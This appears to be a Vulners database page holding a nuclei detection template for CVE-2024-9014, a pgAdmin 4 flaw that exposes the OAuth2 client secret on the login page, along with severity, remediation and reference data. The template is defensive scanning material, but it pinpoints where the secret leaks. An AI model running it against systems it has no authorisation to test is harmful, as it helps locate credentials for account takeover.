Lucene search
K

pgAdmin 4 - Authentication Bypass

🗓️ 01 Jun 2026 05:38:37Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

pgAdmin 4 OAuth2 Authentication Bypass, CVE-2024-901

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-9014
23 Sep 202419:39
circl
CNNVD
pgAdmin 安全漏洞
23 Sep 202400:00
cnnvd
CVE
CVE-2024-9014
23 Sep 202417:04
cve
Cvelist
CVE-2024-9014 OAuth2 client id and secret exposed through the web browser in pgAdmin 4
23 Sep 202417:04
cvelist
GithubExploit
Exploit for CVE-2024-9014
8 Jul 202511:12
githubexploit
GithubExploit
Exploit for CVE-2024-9014
26 Sep 202410:34
githubexploit
F5 Networks
K000148478: PostgreSQL pgAdmin vulnerability CVE-2024-9014
11 Nov 202403:01
f5
Fedora
[SECURITY] Fedora 40 Update: pgadmin4-8.9-3.fc40
4 Oct 202401:47
fedora
Fedora
[SECURITY] Fedora 41 Update: pgadmin4-8.12-1.fc41
7 Oct 202400:16
fedora
Tenable Nessus
Fedora 40 : pgadmin4 (2024-126d22c121)
4 Oct 202400:00
nessus
Rows per page
id: CVE-2024-9014

info:
  name: pgAdmin 4 - Authentication Bypass
  author: s4e-io
  severity: critical
  description: |
    pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.
  impact: |
    Attackers can potentially obtain OAuth2 client ID and secret from exposed configuration in the login page, leading to unauthorized access to user data, authentication bypass, and compromise of pgAdmin 4 instances.
  remediation: |
    Update pgAdmin 4 to a version later than 8.11 that addresses the OAuth2 authentication vulnerability and properly secures client credentials from public exposure.
  reference:
    - https://github.com/EQSTLab/CVE-2024-9014
    - https://github.com/pgadmin-org/pgadmin4/issues/7945
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9014
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2024-9014
    cwe-id: CWE-522
    epss-score: 0.92879
    epss-percentile: 0.99777
  metadata:
    verified: true
    max-request: 1
    vendor: pgadmin-org
    product: pgadmin4
    fofa-query: "pgadmin4"
  tags: cve,cve2024,pgadmin,exposure,auth-bypass,vkev,vuln

http:
  - raw:
      - |
        GET /login?next=/ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        negative: true
        regex:
          - 'OAUTH2_CLIENT_SECRET": null'

      - type: word
        part: body
        words:
          - '<title>pgAdmin 4</title>'
          - 'OAUTH2_CLIENT_SECRET'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200b41b702f614d24b4fd10a68f8d6b68eaaedbaeb8f976af09e91c4fc3eb5ea04022100aa0660efde2a9e833bbb56ba4296340c5a0c552faac79a2d1e5fdb7f8c712f08:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.16.5 - 9.9
EPSS0.92879
SSVC
28